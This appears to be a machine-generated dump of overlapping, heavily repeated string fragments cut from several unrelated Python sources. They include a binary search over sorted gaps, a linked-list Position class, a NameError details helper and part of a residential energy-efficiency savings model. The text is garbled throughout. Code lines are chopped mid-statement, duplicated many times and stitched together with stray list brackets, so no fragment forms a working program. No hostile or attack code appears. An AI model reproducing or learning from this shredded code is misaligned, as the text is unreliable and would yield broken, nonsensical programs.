1 last = arr[i] return cnt def search(start, end, k): while", "arr = [int(si()) for _ in range(n)] arr.sort() MIN = 1 MAX =", "get_count(mid) if cnt >= k: start = mid + 1 res = mid", "= 1 last = arr[0] for i in range(1, n): if arr[i] -", "range(1, n): if arr[i] - last >= gap: cnt += 1 last =", "= arr[0] for i in range(1, n): if arr[i] - last >= gap:", "[int(si()) for _ in range(n)] arr.sort() MIN = 1 MAX = arr[-1] -", "arr.sort() MIN = 1 MAX = arr[-1] - arr[0] def get_count(gap): cnt =", "+ end) // 2 cnt = get_count(mid) if cnt >= k: start =", ">= k: start = mid + 1 res = mid else: end =", "cnt >= k: start = mid + 1 res = mid else: end", "res = mid else: end = mid - 1 return res print(search(MIN, MAX,", "si = sys.stdin.readline n, m = map(int, si().split()) arr = [int(si()) for _", "last = arr[0] for i in range(1, n): if arr[i] - last >=", "+ 1 res = mid else: end = mid - 1 return res", "(start + end) // 2 cnt = get_count(mid) if cnt >= k: start", "def search(start, end, k): while start <= end: mid = (start + end)", "1 last = arr[i] return cnt def search(start, end, k): while start <=", "si().split()) arr = [int(si()) for _ in range(n)] arr.sort() MIN = 1 MAX", "end) // 2 cnt = get_count(mid) if cnt >= k: start = mid", "search(start, end, k): while start <= end: mid = (start + end) //", "last = arr[i] return cnt def search(start, end, k): while start <= end:", "k: start = mid + 1 res = mid else: end = mid", "_ in range(n)] arr.sort() MIN = 1 MAX = arr[-1] - arr[0] def", "n, m = map(int, si().split()) arr = [int(si()) for _ in range(n)] arr.sort()", "while start <= end: mid = (start + end) // 2 cnt =" ]
[ "single element.\"\"\" def __init__(self,container,node): \"\"\"Constructor should not be invoked by the user.\"\"\" self._container", "by the user.\"\"\" self._container = container self._node = node def element(self): \"\"\"Return the", "stored at this position.\"\"\" return self._node._element def __eq__(self,other): \"\"\"Return True if other is", "the user.\"\"\" self._container = container self._node = node def element(self): \"\"\"Return the element", "element(self): \"\"\"Return the element stored at this position.\"\"\" return self._node._element def __eq__(self,other): \"\"\"Return", "location.\"\"\" return ((type(other) is type(self)) and (other._node is self._node)) def __ne__(self,other): \"\"\"Return True", "\"\"\"Return the element stored at this position.\"\"\" return self._node._element def __eq__(self,other): \"\"\"Return True", "the element stored at this position.\"\"\" return self._node._element def __eq__(self,other): \"\"\"Return True if", "<filename>CHAPTER 07 (linked_list)/position_class.py class Position: \"\"\"An abstraction representing the location of a single", "= node def element(self): \"\"\"Return the element stored at this position.\"\"\" return self._node._element", "return ((type(other) is type(self)) and (other._node is self._node)) def __ne__(self,other): \"\"\"Return True if", "not be invoked by the user.\"\"\" self._container = container self._node = node def", "element.\"\"\" def __init__(self,container,node): \"\"\"Constructor should not be invoked by the user.\"\"\" self._container =", "a single element.\"\"\" def __init__(self,container,node): \"\"\"Constructor should not be invoked by the user.\"\"\"", "return self._node._element def __eq__(self,other): \"\"\"Return True if other is a Position representing the", "if other is a Position representing the same location.\"\"\" return ((type(other) is type(self))", "the same location.\"\"\" return ((type(other) is type(self)) and (other._node is self._node)) def __ne__(self,other):", "does not represent the same location.\"\"\" return not(self == other) # opposite of", "\"\"\"Constructor should not be invoked by the user.\"\"\" self._container = container self._node =", "class Position: \"\"\"An abstraction representing the location of a single element.\"\"\" def __init__(self,container,node):", "a Position representing the same location.\"\"\" return ((type(other) is type(self)) and (other._node is", "not represent the same location.\"\"\" return not(self == other) # opposite of __eq__", "same location.\"\"\" return ((type(other) is type(self)) and (other._node is self._node)) def __ne__(self,other): \"\"\"Return", "07 (linked_list)/position_class.py class Position: \"\"\"An abstraction representing the location of a single element.\"\"\"", "def __init__(self,container,node): \"\"\"Constructor should not be invoked by the user.\"\"\" self._container = container", "be invoked by the user.\"\"\" self._container = container self._node = node def element(self):", "((type(other) is type(self)) and (other._node is self._node)) def __ne__(self,other): \"\"\"Return True if other", "other does not represent the same location.\"\"\" return not(self == other) # opposite", "representing the location of a single element.\"\"\" def __init__(self,container,node): \"\"\"Constructor should not be", "user.\"\"\" self._container = container self._node = node def element(self): \"\"\"Return the element stored", "True if other is a Position representing the same location.\"\"\" return ((type(other) is", "element stored at this position.\"\"\" return self._node._element def __eq__(self,other): \"\"\"Return True if other", "def element(self): \"\"\"Return the element stored at this position.\"\"\" return self._node._element def __eq__(self,other):", "container self._node = node def element(self): \"\"\"Return the element stored at this position.\"\"\"", "\"\"\"Return True if other is a Position representing the same location.\"\"\" return ((type(other)", "other is a Position representing the same location.\"\"\" return ((type(other) is type(self)) and", "def __ne__(self,other): \"\"\"Return True if other does not represent the same location.\"\"\" return", "should not be invoked by the user.\"\"\" self._container = container self._node = node", "__init__(self,container,node): \"\"\"Constructor should not be invoked by the user.\"\"\" self._container = container self._node", "= container self._node = node def element(self): \"\"\"Return the element stored at this", "Position: \"\"\"An abstraction representing the location of a single element.\"\"\" def __init__(self,container,node): \"\"\"Constructor", "node def element(self): \"\"\"Return the element stored at this position.\"\"\" return self._node._element def", "is self._node)) def __ne__(self,other): \"\"\"Return True if other does not represent the same", "self._node._element def __eq__(self,other): \"\"\"Return True if other is a Position representing the same", "invoked by the user.\"\"\" self._container = container self._node = node def element(self): \"\"\"Return", "representing the same location.\"\"\" return ((type(other) is type(self)) and (other._node is self._node)) def", "abstraction representing the location of a single element.\"\"\" def __init__(self,container,node): \"\"\"Constructor should not", "def __eq__(self,other): \"\"\"Return True if other is a Position representing the same location.\"\"\"", "the location of a single element.\"\"\" def __init__(self,container,node): \"\"\"Constructor should not be invoked", "\"\"\"An abstraction representing the location of a single element.\"\"\" def __init__(self,container,node): \"\"\"Constructor should", "self._container = container self._node = node def element(self): \"\"\"Return the element stored at", "self._node = node def element(self): \"\"\"Return the element stored at this position.\"\"\" return", "position.\"\"\" return self._node._element def __eq__(self,other): \"\"\"Return True if other is a Position representing", "location of a single element.\"\"\" def __init__(self,container,node): \"\"\"Constructor should not be invoked by", "True if other does not represent the same location.\"\"\" return not(self == other)", "\"\"\"Return True if other does not represent the same location.\"\"\" return not(self ==", "at this position.\"\"\" return self._node._element def __eq__(self,other): \"\"\"Return True if other is a", "this position.\"\"\" return self._node._element def __eq__(self,other): \"\"\"Return True if other is a Position", "self._node)) def __ne__(self,other): \"\"\"Return True if other does not represent the same location.\"\"\"", "(other._node is self._node)) def __ne__(self,other): \"\"\"Return True if other does not represent the", "if other does not represent the same location.\"\"\" return not(self == other) #", "__eq__(self,other): \"\"\"Return True if other is a Position representing the same location.\"\"\" return", "Position representing the same location.\"\"\" return ((type(other) is type(self)) and (other._node is self._node))", "type(self)) and (other._node is self._node)) def __ne__(self,other): \"\"\"Return True if other does not", "is a Position representing the same location.\"\"\" return ((type(other) is type(self)) and (other._node", "and (other._node is self._node)) def __ne__(self,other): \"\"\"Return True if other does not represent", "is type(self)) and (other._node is self._node)) def __ne__(self,other): \"\"\"Return True if other does", "of a single element.\"\"\" def __init__(self,container,node): \"\"\"Constructor should not be invoked by the", "(linked_list)/position_class.py class Position: \"\"\"An abstraction representing the location of a single element.\"\"\" def", "__ne__(self,other): \"\"\"Return True if other does not represent the same location.\"\"\" return not(self" ]
[ "'([_\\w]+)' referenced before assignment$\", oException.args[0]); if not oUnboundLocalErrorMessageMatch: return {}; sVariableName = oUnboundLocalErrorMessageMatch.group(1);", "oNameErrorMessageMatch: return {}; sVariableName = oNameErrorMessageMatch.group(1); if sVariableName != oException.name: return {}; #", "{}; sVariableName = oNameErrorMessageMatch.group(1); if sVariableName != oException.name: return {}; # Sanity check.", "def fdxExceptionDetailsForNameError(oException): if len(oException.args) != 1: return {}; if isinstance(oException, UnboundLocalError): oUnboundLocalErrorMessageMatch =", "oUnboundLocalErrorMessageMatch.group(1); sProblemDescription = \"Uninitialised variable\"; else: oNameErrorMessageMatch = re.match(r\"^(?:global )?name '([_\\w]+)' is not", "not defined$\", oException.args[0]); if not oNameErrorMessageMatch: return {}; sVariableName = oNameErrorMessageMatch.group(1); if sVariableName", "\"aasConsoleOutputLines\": [ [ guExceptionInformationColor, sProblemDescription, \" \", guExceptionInformationHighlightColor, sVariableName, guExceptionInformationColor, \".\", ], ],", "referenced before assignment$\", oException.args[0]); if not oUnboundLocalErrorMessageMatch: return {}; sVariableName = oUnboundLocalErrorMessageMatch.group(1); sProblemDescription", "isinstance(oException, UnboundLocalError): oUnboundLocalErrorMessageMatch = re.match(r\"^local variable '([_\\w]+)' referenced before assignment$\", oException.args[0]); if not", "guExceptionInformationColor, sProblemDescription, \" \", guExceptionInformationHighlightColor, sVariableName, guExceptionInformationColor, \".\", ], ], \"dxHiddenProperties\": { \"args\":", "= oNameErrorMessageMatch.group(1); if sVariableName != oException.name: return {}; # Sanity check. sProblemDescription =", "\".\", ], ], \"dxHiddenProperties\": { \"args\": oException.args, \"name\": oException.name, \"with_traceback\": oException.with_traceback, }, };", "sVariableName = oUnboundLocalErrorMessageMatch.group(1); sProblemDescription = \"Uninitialised variable\"; else: oNameErrorMessageMatch = re.match(r\"^(?:global )?name '([_\\w]+)'", "Sanity check. sProblemDescription = \"Undefined variable\"; return { \"aasConsoleOutputLines\": [ [ guExceptionInformationColor, sProblemDescription,", "\" \", guExceptionInformationHighlightColor, sVariableName, guExceptionInformationColor, \".\", ], ], \"dxHiddenProperties\": { \"args\": oException.args, \"name\":", "!= 1: return {}; if isinstance(oException, UnboundLocalError): oUnboundLocalErrorMessageMatch = re.match(r\"^local variable '([_\\w]+)' referenced", "if not oNameErrorMessageMatch: return {}; sVariableName = oNameErrorMessageMatch.group(1); if sVariableName != oException.name: return", "guExceptionInformationHighlightColor, sVariableName, guExceptionInformationColor, \".\", ], ], \"dxHiddenProperties\": { \"args\": oException.args, \"name\": oException.name, \"with_traceback\":", "{}; if isinstance(oException, UnboundLocalError): oUnboundLocalErrorMessageMatch = re.match(r\"^local variable '([_\\w]+)' referenced before assignment$\", oException.args[0]);", "else: oNameErrorMessageMatch = re.match(r\"^(?:global )?name '([_\\w]+)' is not defined$\", oException.args[0]); if not oNameErrorMessageMatch:", "re.match(r\"^local variable '([_\\w]+)' referenced before assignment$\", oException.args[0]); if not oUnboundLocalErrorMessageMatch: return {}; sVariableName", "check. sProblemDescription = \"Undefined variable\"; return { \"aasConsoleOutputLines\": [ [ guExceptionInformationColor, sProblemDescription, \"", "oUnboundLocalErrorMessageMatch = re.match(r\"^local variable '([_\\w]+)' referenced before assignment$\", oException.args[0]); if not oUnboundLocalErrorMessageMatch: return", "len(oException.args) != 1: return {}; if isinstance(oException, UnboundLocalError): oUnboundLocalErrorMessageMatch = re.match(r\"^local variable '([_\\w]+)'", "= re.match(r\"^local variable '([_\\w]+)' referenced before assignment$\", oException.args[0]); if not oUnboundLocalErrorMessageMatch: return {};", "\"Uninitialised variable\"; else: oNameErrorMessageMatch = re.match(r\"^(?:global )?name '([_\\w]+)' is not defined$\", oException.args[0]); if", "], ], \"dxHiddenProperties\": { \"args\": oException.args, \"name\": oException.name, \"with_traceback\": oException.with_traceback, }, }; from", "sProblemDescription = \"Uninitialised variable\"; else: oNameErrorMessageMatch = re.match(r\"^(?:global )?name '([_\\w]+)' is not defined$\",", "not oNameErrorMessageMatch: return {}; sVariableName = oNameErrorMessageMatch.group(1); if sVariableName != oException.name: return {};", "oUnboundLocalErrorMessageMatch: return {}; sVariableName = oUnboundLocalErrorMessageMatch.group(1); sProblemDescription = \"Uninitialised variable\"; else: oNameErrorMessageMatch =", "= \"Uninitialised variable\"; else: oNameErrorMessageMatch = re.match(r\"^(?:global )?name '([_\\w]+)' is not defined$\", oException.args[0]);", "'([_\\w]+)' is not defined$\", oException.args[0]); if not oNameErrorMessageMatch: return {}; sVariableName = oNameErrorMessageMatch.group(1);", "sVariableName != oException.name: return {}; # Sanity check. sProblemDescription = \"Undefined variable\"; return", "= oUnboundLocalErrorMessageMatch.group(1); sProblemDescription = \"Uninitialised variable\"; else: oNameErrorMessageMatch = re.match(r\"^(?:global )?name '([_\\w]+)' is", ")?name '([_\\w]+)' is not defined$\", oException.args[0]); if not oNameErrorMessageMatch: return {}; sVariableName =", "oException.args[0]); if not oUnboundLocalErrorMessageMatch: return {}; sVariableName = oUnboundLocalErrorMessageMatch.group(1); sProblemDescription = \"Uninitialised variable\";", "assignment$\", oException.args[0]); if not oUnboundLocalErrorMessageMatch: return {}; sVariableName = oUnboundLocalErrorMessageMatch.group(1); sProblemDescription = \"Uninitialised", "{ \"args\": oException.args, \"name\": oException.name, \"with_traceback\": oException.with_traceback, }, }; from ..mColorsAndChars import *;", "!= oException.name: return {}; # Sanity check. sProblemDescription = \"Undefined variable\"; return {", "return {}; sVariableName = oUnboundLocalErrorMessageMatch.group(1); sProblemDescription = \"Uninitialised variable\"; else: oNameErrorMessageMatch = re.match(r\"^(?:global", "re; def fdxExceptionDetailsForNameError(oException): if len(oException.args) != 1: return {}; if isinstance(oException, UnboundLocalError): oUnboundLocalErrorMessageMatch", "[ [ guExceptionInformationColor, sProblemDescription, \" \", guExceptionInformationHighlightColor, sVariableName, guExceptionInformationColor, \".\", ], ], \"dxHiddenProperties\":", "= re.match(r\"^(?:global )?name '([_\\w]+)' is not defined$\", oException.args[0]); if not oNameErrorMessageMatch: return {};", "is not defined$\", oException.args[0]); if not oNameErrorMessageMatch: return {}; sVariableName = oNameErrorMessageMatch.group(1); if", "return {}; if isinstance(oException, UnboundLocalError): oUnboundLocalErrorMessageMatch = re.match(r\"^local variable '([_\\w]+)' referenced before assignment$\",", "\"dxHiddenProperties\": { \"args\": oException.args, \"name\": oException.name, \"with_traceback\": oException.with_traceback, }, }; from ..mColorsAndChars import", "sVariableName, guExceptionInformationColor, \".\", ], ], \"dxHiddenProperties\": { \"args\": oException.args, \"name\": oException.name, \"with_traceback\": oException.with_traceback,", "= \"Undefined variable\"; return { \"aasConsoleOutputLines\": [ [ guExceptionInformationColor, sProblemDescription, \" \", guExceptionInformationHighlightColor,", "variable\"; else: oNameErrorMessageMatch = re.match(r\"^(?:global )?name '([_\\w]+)' is not defined$\", oException.args[0]); if not", "guExceptionInformationColor, \".\", ], ], \"dxHiddenProperties\": { \"args\": oException.args, \"name\": oException.name, \"with_traceback\": oException.with_traceback, },", "# Sanity check. sProblemDescription = \"Undefined variable\"; return { \"aasConsoleOutputLines\": [ [ guExceptionInformationColor,", "[ guExceptionInformationColor, sProblemDescription, \" \", guExceptionInformationHighlightColor, sVariableName, guExceptionInformationColor, \".\", ], ], \"dxHiddenProperties\": {", "not oUnboundLocalErrorMessageMatch: return {}; sVariableName = oUnboundLocalErrorMessageMatch.group(1); sProblemDescription = \"Uninitialised variable\"; else: oNameErrorMessageMatch", "{ \"aasConsoleOutputLines\": [ [ guExceptionInformationColor, sProblemDescription, \" \", guExceptionInformationHighlightColor, sVariableName, guExceptionInformationColor, \".\", ],", "sVariableName = oNameErrorMessageMatch.group(1); if sVariableName != oException.name: return {}; # Sanity check. sProblemDescription", "return { \"aasConsoleOutputLines\": [ [ guExceptionInformationColor, sProblemDescription, \" \", guExceptionInformationHighlightColor, sVariableName, guExceptionInformationColor, \".\",", "import re; def fdxExceptionDetailsForNameError(oException): if len(oException.args) != 1: return {}; if isinstance(oException, UnboundLocalError):", "if isinstance(oException, UnboundLocalError): oUnboundLocalErrorMessageMatch = re.match(r\"^local variable '([_\\w]+)' referenced before assignment$\", oException.args[0]); if", "oNameErrorMessageMatch = re.match(r\"^(?:global )?name '([_\\w]+)' is not defined$\", oException.args[0]); if not oNameErrorMessageMatch: return", "if len(oException.args) != 1: return {}; if isinstance(oException, UnboundLocalError): oUnboundLocalErrorMessageMatch = re.match(r\"^local variable", "before assignment$\", oException.args[0]); if not oUnboundLocalErrorMessageMatch: return {}; sVariableName = oUnboundLocalErrorMessageMatch.group(1); sProblemDescription =", "defined$\", oException.args[0]); if not oNameErrorMessageMatch: return {}; sVariableName = oNameErrorMessageMatch.group(1); if sVariableName !=", "variable\"; return { \"aasConsoleOutputLines\": [ [ guExceptionInformationColor, sProblemDescription, \" \", guExceptionInformationHighlightColor, sVariableName, guExceptionInformationColor,", "<gh_stars>1-10 import re; def fdxExceptionDetailsForNameError(oException): if len(oException.args) != 1: return {}; if isinstance(oException,", "1: return {}; if isinstance(oException, UnboundLocalError): oUnboundLocalErrorMessageMatch = re.match(r\"^local variable '([_\\w]+)' referenced before", "oException.args[0]); if not oNameErrorMessageMatch: return {}; sVariableName = oNameErrorMessageMatch.group(1); if sVariableName != oException.name:", "return {}; # Sanity check. sProblemDescription = \"Undefined variable\"; return { \"aasConsoleOutputLines\": [", "sProblemDescription, \" \", guExceptionInformationHighlightColor, sVariableName, guExceptionInformationColor, \".\", ], ], \"dxHiddenProperties\": { \"args\": oException.args,", "{}; sVariableName = oUnboundLocalErrorMessageMatch.group(1); sProblemDescription = \"Uninitialised variable\"; else: oNameErrorMessageMatch = re.match(r\"^(?:global )?name", "{}; # Sanity check. sProblemDescription = \"Undefined variable\"; return { \"aasConsoleOutputLines\": [ [", "], \"dxHiddenProperties\": { \"args\": oException.args, \"name\": oException.name, \"with_traceback\": oException.with_traceback, }, }; from ..mColorsAndChars", "\", guExceptionInformationHighlightColor, sVariableName, guExceptionInformationColor, \".\", ], ], \"dxHiddenProperties\": { \"args\": oException.args, \"name\": oException.name,", "sProblemDescription = \"Undefined variable\"; return { \"aasConsoleOutputLines\": [ [ guExceptionInformationColor, sProblemDescription, \" \",", "\"Undefined variable\"; return { \"aasConsoleOutputLines\": [ [ guExceptionInformationColor, sProblemDescription, \" \", guExceptionInformationHighlightColor, sVariableName,", "variable '([_\\w]+)' referenced before assignment$\", oException.args[0]); if not oUnboundLocalErrorMessageMatch: return {}; sVariableName =", "if not oUnboundLocalErrorMessageMatch: return {}; sVariableName = oUnboundLocalErrorMessageMatch.group(1); sProblemDescription = \"Uninitialised variable\"; else:", "if sVariableName != oException.name: return {}; # Sanity check. sProblemDescription = \"Undefined variable\";", "oException.name: return {}; # Sanity check. sProblemDescription = \"Undefined variable\"; return { \"aasConsoleOutputLines\":", "UnboundLocalError): oUnboundLocalErrorMessageMatch = re.match(r\"^local variable '([_\\w]+)' referenced before assignment$\", oException.args[0]); if not oUnboundLocalErrorMessageMatch:", "re.match(r\"^(?:global )?name '([_\\w]+)' is not defined$\", oException.args[0]); if not oNameErrorMessageMatch: return {}; sVariableName", "return {}; sVariableName = oNameErrorMessageMatch.group(1); if sVariableName != oException.name: return {}; # Sanity", "fdxExceptionDetailsForNameError(oException): if len(oException.args) != 1: return {}; if isinstance(oException, UnboundLocalError): oUnboundLocalErrorMessageMatch = re.match(r\"^local", "oNameErrorMessageMatch.group(1); if sVariableName != oException.name: return {}; # Sanity check. sProblemDescription = \"Undefined" ]
[ "stage.append(i) print(f'{num} is a Unique Number.') num = input('Enter the number: ') check(num)", "[] for i in num: if i in stage: print(f\"{num} is not a", "= [] for i in num: if i in stage: print(f\"{num} is not", "Unique Number.\") return stage.append(i) print(f'{num} is a Unique Number.') num = input('Enter the", "for i in num: if i in stage: print(f\"{num} is not a Unique", "in stage: print(f\"{num} is not a Unique Number.\") return stage.append(i) print(f'{num} is a", "stage = [] for i in num: if i in stage: print(f\"{num} is", "i in num: if i in stage: print(f\"{num} is not a Unique Number.\")", "not a Unique Number.\") return stage.append(i) print(f'{num} is a Unique Number.') num =", "i in stage: print(f\"{num} is not a Unique Number.\") return stage.append(i) print(f'{num} is", "print(f\"{num} is not a Unique Number.\") return stage.append(i) print(f'{num} is a Unique Number.')", "return stage.append(i) print(f'{num} is a Unique Number.') num = input('Enter the number: ')", "check(num): stage = [] for i in num: if i in stage: print(f\"{num}", "in num: if i in stage: print(f\"{num} is not a Unique Number.\") return", "num: if i in stage: print(f\"{num} is not a Unique Number.\") return stage.append(i)", "stage: print(f\"{num} is not a Unique Number.\") return stage.append(i) print(f'{num} is a Unique", "def check(num): stage = [] for i in num: if i in stage:", "a Unique Number.\") return stage.append(i) print(f'{num} is a Unique Number.') num = input('Enter", "if i in stage: print(f\"{num} is not a Unique Number.\") return stage.append(i) print(f'{num}", "is not a Unique Number.\") return stage.append(i) print(f'{num} is a Unique Number.') num", "Number.\") return stage.append(i) print(f'{num} is a Unique Number.') num = input('Enter the number:" ]
[ "price of offset heating fuels. The cost to retrofit each home is also", "self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh r_elec = self.proposed_fuel_kWh_consumption/constants.mmbtu_to_kWh s_elec = b_elec - r_elec b_elec_cost = self.baseline_fuel_kWh_consumption *", "b_elec = self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh r_elec = self.proposed_fuel_kWh_consumption/constants.mmbtu_to_kWh s_elec = b_elec - r_elec b_elec_cost =", "opportunities Attributes ---------- opportunity_HH : int Houses that can be retrofit savings_HF :", "s_oil, \"Residential: Heating Oil (gallons/year) Cost Baseline\": b_oil_cost, \"Residential: Heating Oil (gallons/year) Cost", "> 1 and tag[1] != 'residential': self.was_run = False self.reason = \"Not a", "#~ r_con = self.forecast.base_res_consumption avg_con = float(self.comp_specs['data']['average kWh per house']) if not self.intertie_data", "ResidentialBuildings(AnnualSavings): \"\"\"Residential energy efficiency component of the Alaska Affordable Energy Model: This module", "calc_proposed_fuel_consumption (self): \"\"\"Calculate the proposed heating fuel consumption Attributes ---------- proposed_fuel_Hoil_consumption : np.array", "(self): \"\"\"calculate the proposed kWh consumption for a community Attributes ---------- proposed_kWh_consumption :", "proposed electricity cost \"\"\" kWh_cost = self.cd[\"electric prices\"].\\ ix[self.start_year:self.end_year] kWh_cost = kWh_cost.T.values[0] #", "Object aaem.forecast : forecast module, see information on Forecast Object aaem.diagnostics : diagnostics", "value: forecast cd : dictionary general data for a community. Initial value: 'community'", "rd = self.comp_specs['data'] ## #HH self.opportunity_HH = self.init_HH -rd[\"BEES Number\"] -rd[\"Post-Retrofit Number\"] self.opportunity_HH", "100.0 percent_accounted += amnt self.init_kWh = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_kWh) #~ self.init_coal #~", "= self.baseline_fuel_Hoil_consumption * HF_price r_oil_cost = self.proposed_fuel_Hoil_consumption * HF_price s_oil_cost = b_oil_cost -", "multiplier' ) self.set_project_life_details( self.comp_specs[\"start year\"], self.comp_specs[\"lifetime\"] ) yr = int(self.comp_specs['data']['Year']) self.base_pop = int(self.forecast.population.ix[yr])#.values[0][0]", "#~ self.percent_savings = np.float64( self.percent_savings) area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI =", "Heating Propane (gallons/year) Cost Post Retrofit\": r_LP_cost, \"Residential: Heating Propane (gallons/year) Cost Savings\":", "(self, scalers = {'capital costs':1.0}): \"\"\"Runs the component. The Annual Total Savings,Annual Costs,", "consumption proposed_fuel_gas_consumption : np.array proposed natural gas consumption proposed_fuel_kWh_consumption : np.array proposed electric", "self.start_year df = DataFrame({ \"Residential: Heating Fuel All (MMBtu/year) Consumption Baseline\": self.get_base_HF_use(), \"Residential:", "Gas (Mcf/year) Consumption Savings\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Baseline\", \"Residential: Heating", "Gas (Mcf/year) Consumption Post Retrofit\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Savings\", \"Residential:", "of fuel \"\"\" HH_consumption = HH * self.avg_kWh_consumption_per_HH * \\ constants.kWh_to_mmbtu return np.float64(fuel_amnt", "are based on the number of units that have not been retrofit as", "HH = self.comp_specs['data']['Total Occupied'] pop = self.forecast.base_pop self.init_HH = int(round(HH*(val / pop))) def", "= (self.diesel_prices + self.cd['heating fuel premium']) self.hoil_price = HF_price wood_price = self.cd['cordwood price']", "in the base and proposed fuel costs \"\"\" self.annual_electric_savings = np.zeros(self.project_life) def calc_annual_heating_savings", "All (MMBtu/year) Cost Savings\": self.get_heating_savings_costs(), \"Residential: Heating Oil (gallons/year) Consumption Baseline\": b_oil, \"Residential:", "(Mcf/year) Cost Baseline\", \"Residential: Heating Natural Gas (Mcf/year) Cost Post Retrofit\", \"Residential: Heating", "electric summary\"].values[0] if self.cd[\"model electricity\"]: self.elec_prices = community_data.get_item('community', 'electric prices') self.comp_specs = community_data.get_section(COMPONENT_NAME)", "= int(self.comp_specs['data']['Year']) self.base_pop = int(self.forecast.population.ix[yr])#.values[0][0] peps_per_house = float(self.base_pop) / \\ self.comp_specs['data']['Total Occupied'] households", "\"\"\" self.capital_costs = self.opportunity_HH * self.refit_cost_rate def calc_annual_electric_savings (self): \"\"\"calculate annual electric savings", "yr = int(self.comp_specs['data']['Year']) self.base_pop = int(self.forecast.population.ix[yr])#.values[0][0] peps_per_house = float(self.base_pop) / \\ self.comp_specs['data']['Total Occupied']", "self.elec_prices = community_data.get_item('community', 'electric prices') self.comp_specs = community_data.get_section(COMPONENT_NAME) self.component_name = COMPONENT_NAME self.forecast =", "calc_init_consumption (self): \"\"\"Calculate the initial consumption for each fuel type. Attributes ---------- init_HF", "= self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price = self.cd['propane price'] gas_price = self.cd['natural gas price'] self.baseline_HF_cost", "and Internal Rate of Return will all be calculated. There must be a", "constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) / 100.0 self.savings_gas = avg_EUI_reduction * self.opportunity_HH *", "df.columns[:-2].tolist()] fname = os.path.join(directory, self.cd['name'] + '_' +\\ self.component_name.lower() + \"_output.csv\") fname =", "scalers['capital costs']) self.calc_annual_net_benefit() self.calc_npv(self.cd['discount rate'], self.cd['current year']) self.calc_levelized_costs(0) def get_fuel_total_saved (self): \"\"\"Get total", "self.init_HH) * area * EUI self.baseline_fuel_Hoil_consumption = \\ self.init_HF+np.float64(rd[\"Fuel Oil\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_HF", "heating fuel consumption Attributes ---------- proposed_fuel_Hoil_consumption : np.array proposed heating oil consumption proposed_fuel_wood_consumption", "the project Attributes ---------- init_HH : int estimated households for first year of", "except ValueError: pass df = df[[ \"Residential: Heating Oil (gallons/year) Consumption Baseline\", \"Residential:", "False Notes ----- Accepted scalers: capital costs. \"\"\" self.was_run = True self.reason =", "* EUI # the one in each of these function calls is an", "self.savings_LP* (1/constants.mmbtu_to_gal_LP) def calc_consumption_by_fuel (self, fuel_amnt, total_consumption, HH, cf): \"\"\"calculate consumption by fuel", "of community_data See also -------- aaem.community_data : community data module, see information on", "consumption proposed_fuel_LP_consumption : np.array proposed LP consumption proposed_fuel_gas_consumption : np.array proposed natural gas", "Baseline\": b_NG, \"Residential: Heating Natural Gas (Mcf/year) Consumption Post Retrofit\": r_NG, \"Residential: Heating", "= self.forecast.base_pop self.init_HH = int(round(HH*(val / pop))) def calc_init_consumption (self): \"\"\"Calculate the initial", "(self): \"\"\"calculate base line heating fuel costs Attributes ---------- baseline_HF_cost : np.array baseline", "0: self.baseline_fuel_gas_consumption = 0 self.baseline_HF_consumption = \\ self.baseline_fuel_Hoil_consumption * \\ (1/constants.mmbtu_to_gal_HF) +\\ self.baseline_fuel_wood_consumption", "= self.intertie_data.get_item( 'Residential Energy Efficiency', 'data' )['average kWh per house'] #~ self.avg_monthly_consumption =", "gas_price s_NG_cost = b_NG_cost - r_NG_cost years = np.array(range(self.project_life)) + self.start_year df =", "Consumption Post Retrofit\": r_bio, \"Residential: Heating Biomass (cords/year) Consumption Savings\": s_bio, \"Residential: Heating", "data this component has no prerequisites leave empty Attributes ---------- diagnostics : diagnostics", "path output directory \"\"\" if not self.was_run: return if self.cd[\"model financial\"]: HF_price =", "self.savings_LP = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_LP) amnt =", "Savings\": s_NG, \"Residential: Heating Natural Gas (Mcf/year) Cost Baseline\": b_NG_cost, \"Residential: Heating Natural", "(Mcf/year) Consumption Baseline\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Post Retrofit\", \"Residential: Heating", ": np.array baseline cost of heating fuels per year \"\"\" HF_price = (self.diesel_prices", "self.was_run: return if self.cd[\"model financial\"]: HF_price = (self.diesel_prices + self.cd['heating fuel premium']) wood_price", "+\\ self.savings_LP* (1/constants.mmbtu_to_gal_LP) def calc_consumption_by_fuel (self, fuel_amnt, total_consumption, HH, cf): \"\"\"calculate consumption by", "consumption \"\"\" self.proposed_fuel_Hoil_consumption = \\ self.baseline_fuel_Hoil_consumption - self.savings_HF self.proposed_fuel_wood_consumption = \\ self.baseline_fuel_wood_consumption -", "b_bio, \"Residential: Heating Biomass (cords/year) Consumption Post Retrofit\": r_bio, \"Residential: Heating Biomass (cords/year)", "---------- opportunity_HH : int Houses that can be retrofit savings_HF : float savings", "= \\ self.comp_specs['average refit cost'] * \\ community_data.get_item( 'community', 'regional construction multiplier' )", "Forecast forecast for a community diagnostics : diagnostics, optional diagnostics for tracking error/warning", "estimates the potential improvements to heating efficiency of residential buildings (homes). Consumption and", "amnt = np.float64(rd[\"Electricity\"]) / 100.0 self.savings_kWh = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt,", "Savings\": s_oil_cost, \"Residential: Heating Biomass (cords/year) Consumption Baseline\": b_bio, \"Residential: Heating Biomass (cords/year)", "\"Residential: Electric Heat (kWh/year) Cost Post Retrofit\", \"Residential: Electric Heat (kWh/year) Cost Savings\",", "from the total consumption Parameters ---------- fuel_amnt: float % of fuel used total_consumption", "Retrofit\": r_LP, \"Residential: Heating Propane (gallons/year) Consumption Savings\": s_LP, \"Residential: Heating Propane (gallons/year)", "as a percentage of the pre-retrofit consumption, and the forecasted price of offset", "\"Residential: Heating Biomass (cords/year) Cost Savings\": s_bio_cost, \"Residential: Electric Heat (kWh/year) Consumption Baseline\":", "tag[1] != 'residential': self.was_run = False self.reason = \"Not a residential project.\" return", "(HH - self.init_HH) * area * EUI self.baseline_fuel_Hoil_consumption = \\ 